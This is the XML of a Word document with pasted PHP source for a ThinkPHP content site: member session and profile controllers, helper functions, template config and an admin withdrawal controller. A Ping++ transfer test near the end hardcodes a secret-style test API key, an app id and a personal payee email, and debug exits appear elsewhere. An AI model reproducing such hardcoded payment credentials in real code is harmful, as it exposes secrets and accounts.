    <w:p w14:paraId="387B95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$getImgInfo = "image{$imgExt}";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F6B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$getImgInfo($imgInfo, null, $quality);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2FD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imagedestroy($imgInfo);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C76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3A60D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6A6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gonggao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EC1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input('pages') ? input('pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D86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$data=Db::name('gonggao')-&gt;order('id desc')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E34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7C07DD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$data['data'][$k]['time']=date('Y-m-d H:i',$v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CD79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B6FB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2BE3AE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A9D9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714C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44FA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app\index\controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDCFB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app\index\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619D33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66CED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Index extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27857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777A4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__construct($tokenaaa=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F7BC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620587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1EDB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7FCF1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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461E89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dump("123");exit;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C850E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78F2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A267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appurl(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137AA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等待配置下载地址</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64270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488C3B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$url=config()['config']['appurl'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E33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header("Location: ".$url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EFDA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8D64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app(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D59BB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6881B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816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tianqi(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5598C6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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610BC0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$html;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF8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165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E3538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AC6C0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app\index\controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DF5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use app\index\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B029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542C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2F133E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104BDB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Member extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492A47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063B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__construct(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68198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parent::__construct();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379103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if(!Session::has('user','ffxiangUser')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51458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$this-&gt;redirect("user/login");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744BD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1DBCB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$this-&gt;assign('member',_member());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA6B1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$category=Db::name('member_category')-&gt;where(['tid'=&gt;0,'hide'=&gt;1])-&gt;order('des desc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52009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$this-&gt;assign('category',$category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B393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5D75F8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$controller=strtolower($request-&gt;controller());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D744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$action=strtolower($request-&gt;action());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D85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$categorytid=Db::name('member_category')-&gt;where(['controller'=&gt;$controller,'function'=&gt;$action])-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C831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if($categorytid['tid'] != 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA3B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$categorytid=Db::name('member_category')-&gt;where('id',$categorytid['tid'])-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E3F3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05C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$categorys=Db::name('member_category')-&gt;where(['tid'=&gt;$categorytid['id'],'hide'=&gt;1])-&gt;order('des desc,id asc')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6707E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$this-&gt;assign('categorys',$categorys);      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3582C6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$this-&gt;assign('active',$controller.$action);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7518F3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$this-&gt;assign('categorytid',$categorytid);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593833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5C1861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2E508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$member=_member();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220F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$where['id']=['&lt;',3];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561EF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$member_groups=Db::name('member_groups')-&gt;where('jingyan','gt',$member['jingyan'])-&gt;order('id asc')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39406A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$this-&gt;assign('member_groups',$member_groups);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77556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1751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5F3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out(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE3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_records(_member('id'),'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>退出登录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485A4D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session(null, 'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B53B7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$this-&gt;redirect('user/login');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A30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5C0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modify(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77608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DC6D8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648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nickname(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3FA2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3543A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1535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mobile(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C932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28FFD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FEA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email(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B8C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F27F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0C47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password(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611572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EE8E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9183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records(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216A7F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DB69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8F01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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5635F7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F7536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BFAD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articleAdd(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7087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$articleCode=Db::name('member_config')-&gt;where('name','articleCode')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1D78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$this-&gt;assign('articleCode',$articleCode);   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AD81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65CC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509C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favoriteList(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F938D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AB554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6A87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moneypay(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3E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$token=Session::get('user','ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31654B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$this-&gt;assign('token',$token);    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16055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5DA3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1E4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payRecord(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487816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20F7F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A7BB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weitoutiao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C4E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$this-&gt;redirect("user/index",['id'=&gt;_member('id'),'weitoutiao'=&gt;'1']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2594A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E03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23DCF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853FE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094718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07928B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_webfig($name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF39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if($name){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A60E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$data=config()['appConfig'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A2BD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$data['logo']   = _imgurl().$data['logo'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353DE3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$data=$data[$name];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2257B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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C9FF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75489B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7D764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return $data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB7D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31265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_ad($id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DABD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$data=Db::name('ad')-&gt;where(['id'=&gt;$id])-&gt;cache(_cache('db'))-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A1FF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$data['img'] = _imgurl().$data['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CFCF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D4943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EC0D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_member($name=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684369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$id=Session::get('user','ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D41E5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if(!$id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641ECB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session(null, 'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C799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header(_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F812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09906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04EC7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$id=_decrypt($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF62D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if(!$id){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452B4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session(null, 'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27604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header(_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BE40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24D00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5B54EC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40609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session(null, 'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5697B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header(_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147565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6C816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11E8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$data=Db::name('member')-&gt;where(['id'=&gt;$id,'hide'=&gt;1])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B043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7ADE91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session(null, 'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4778A1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header(_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E5A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B277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2DE7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$data['guanzhu']=Db::name('member_guanzhu')-&gt;where(['uid'=&gt;$data['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F2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$data['fensi']=Db::name('member_guanzhu')-&gt;where(['gz_uid'=&gt;$data['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40619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$data['inco']=_userGroups($data['jingyan'],'img');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFE97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$data['groups']=_userGroups($data['jingyan']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1416DA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if($data['nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCD23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$data['username']=$data['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DEAC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}elseif($data['user']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549E6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$data['username']=$data['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2F2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}elseif($data['mobile']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E0DF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$data['username']=$data['mobile'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FD95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$data['username']=substr($data['username'],0,3).'****'.substr($data['username'],7,4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C527A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}elseif($data['email']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3341EF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$email = explode('@',$data['email']);                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039D07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$data['username'] = substr($data['email'],0,2).'*'.$email[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2EBA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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB733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$data='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68434A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789D3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if($data['img']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43396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$data['img']=_imgurl().$data['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC36A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FD2F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$data['img']='/public/style/index/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C716A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02C9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409D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$data[$name];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D48B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29FEB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B86BB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D15E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D2051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ueditor($name=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF361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if(!$name){$name='content';}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDE1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$html='&lt;link href="/public/style/admin/plugins/ueditor/themes/default/_css/umeditor.css" type="text/css" rel="stylesheet"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE8D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$html.='&lt;script type="text/javascript" charset="utf-8" src="/public/style/admin/plugins/ueditor/umeditor.config.js"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D8FE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$html.='&lt;script type="text/javascript" charset="utf-8" src="/public/style/admin/plugins/ueditor/editor_api.js"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAF5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$html.='&lt;script type="text/javascript" src="/public/style/admin/plugins/ueditor/lang/zh-cn/zh-cn.js"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A67F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$html.='&lt;script type="text/javascript"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A4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$html.="var ue=UM.getEditor('".$name."');";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6D8F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$html.='&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F27A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106F34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5359B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_session(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C1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if(!Session::has('user','ffxiangUser')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA81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66A8FF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5675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1BF8C5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1B2E7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_token(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376C25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Session::has('user','ffxiangUser') ? Session::get('user','ffxiangUser') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEAC4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B732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_isMobileApp()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADD9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377B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 ($_SERVER['HTTP_X_WAP_PROFILE']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227726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00E2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4CF25B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89CC9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 ($_SERVER['HTTP_VIA']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EF3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1955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stristr($_SERVER['HTTP_VIA'], "wap") ? true : false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8059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8FA59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 ($_SERVER['HTTP_USER_AGENT']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174AC3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3620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$clientkeywords = array ('nokia',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7987CF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'sony',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2373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'ericsson',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D24D8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'mot',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399AE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'samsung',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077771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'htc',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4C4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'sgh',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668BC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'lg',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFE0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'sharp',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA3D4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'sie-',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2563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'philips',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146DB7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'panasonic',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032A4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'alcatel',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E808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'lenovo',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D996A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'iphone',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0188AC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'ipod',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735A4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'blackberry',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693305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'meizu',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6554F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'android',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08608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'netfront',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E66E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'symbian',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181F9B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'ucweb',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8C6F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'windowsce',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19922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'palm',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16951E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'operamini',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CFE7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'operamobi',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF89F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'openwave',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFAE4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'nexusone',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F4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'cldc',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8C20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'midp',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BFB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'wap',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E58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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35028E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E27BD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(preg_match("/(" . implode('|', $clientkeywords) . ")/i", strtolower($_SERVER['HTTP_USER_AGENT'])))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15997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7FDF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56AE7B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ED637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B2B6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 ($_SERVER['HTTP_ACCEPT']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F4D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3AC05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((strpos($_SERVER['HTTP_ACCEPT'], 'vnd.wap.wml') !== false) &amp;&amp; (strpos($_SERVER['HTTP_ACCEPT'], 'text/html') === false || (strpos($_SERVER['HTTP_ACCEPT'], 'vnd.wap.wml') &lt; strpos($_SERVER['HTTP_ACCEPT'], 'text/html'))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49580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566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7A8B84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55A4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4AE4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2D00B6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F70BE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734C9F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'view_replace_str'  =&gt;  [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0A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'__PUBLIC__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'/public/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77697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'__STYLE__'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'/public/style/index/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253E53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    '__CSS__'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'/public/style/index/css/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63163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'__JS__'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xml:space="preserve">'/public/style/index/js/', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6692DD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'__IMG__'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xml:space="preserve">'/public/style/index/img/', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B50E5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'__P__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        =&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">'/public/style/index/plugins/', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59753A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'__IMAGES__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'/public/uploads/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0148A4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'__IMGERROE__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'/public/style/index/img/images.jpg',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AED2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'__T_C__'       =&gt;  '/public/style/toutiao/css/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56076B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'__T_I__'       =&gt;  '/public/style/toutiao/image/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B46A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'__T_J__'       =&gt;  '/public/style/toutiao/js/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2559A4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'__MP_J__'      =&gt;  '/public/style/mp/js/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B07A0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'__MP_I__'      =&gt;  '/public/style/mp/image/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9CB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'__MP_C__'      =&gt;  '/public/style/mp/css/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA510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10691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'app_trace'              =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA49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'default_controller'     =&gt; 'Article',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E6E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'template'               =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC4F4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'Think',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4E5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'view_path'    =&gt; 'www_suxiangw_com/toutiao/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7192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'view_suffix'  =&gt; 'html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130F5D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'view_depr'    =&gt; DS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F29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'tpl_begin'    =&gt; '{',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422A1A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'tpl_end'      =&gt; '}',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64469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'taglib_begin' =&gt; '{',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021C21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'taglib_end'   =&gt; '}',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C310D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'taglib_pre_load'     =&gt;    'app\common\taglib\Fx', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E52E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24F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B720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FEAA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0793DC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4E73C8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AD06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Tixian extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3833EB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AEDAD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4B166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$get=input();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EF6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3CC1CC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if(!empty($get['uid'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4EF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$where['uid']=$get['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1104EE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434B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$data=Db::name('member_tixian')-&gt;where($where)-&gt;order('time desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B2D7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450E40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4ED1E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5F6FC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F4A8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E0F0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edit(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68862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7DC7EB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Db::name('member_tixian')-&gt;where(['id'=&gt;$id])-&gt;setField('data',0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79922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7845E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Db::name('member_tixian')-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3E3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 $user['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692FF9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提现失败，退回</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$user['money'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708D30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7391A6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$user['uid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359B4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2245F6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710FA4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0017A4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1A5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C5DBF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t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137938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6C7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失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580825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8A6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dk(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181A53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\Pingpp\Pingpp::setApiKey('sk_test_zz94WHfTufHKi9ejb1azj140');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F09F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\Pingpp\Pingpp::setPrivateKeyPath('./public/pingxx/your_rsa_private_key.pem');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1ADE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 = \Pingpp\Transfer::create(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D5C1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E0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'order_no'    =&gt; '123456789',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7437A5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         =&gt; array('id' =&gt; 'app_f1aHePKCu9mTafT4'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C72B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     =&gt; 'alipay',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E523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'amount'      =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358A6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'currency'    =&gt; 'cny',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C6A1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'b2c',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17372E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'recipient'   =&gt; 'mohuanshji85@163.com',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF01A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'description' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>测试打款</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2828E0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378D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2E97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dump($tr);</w:t>
      </w:r>
    </w:p>
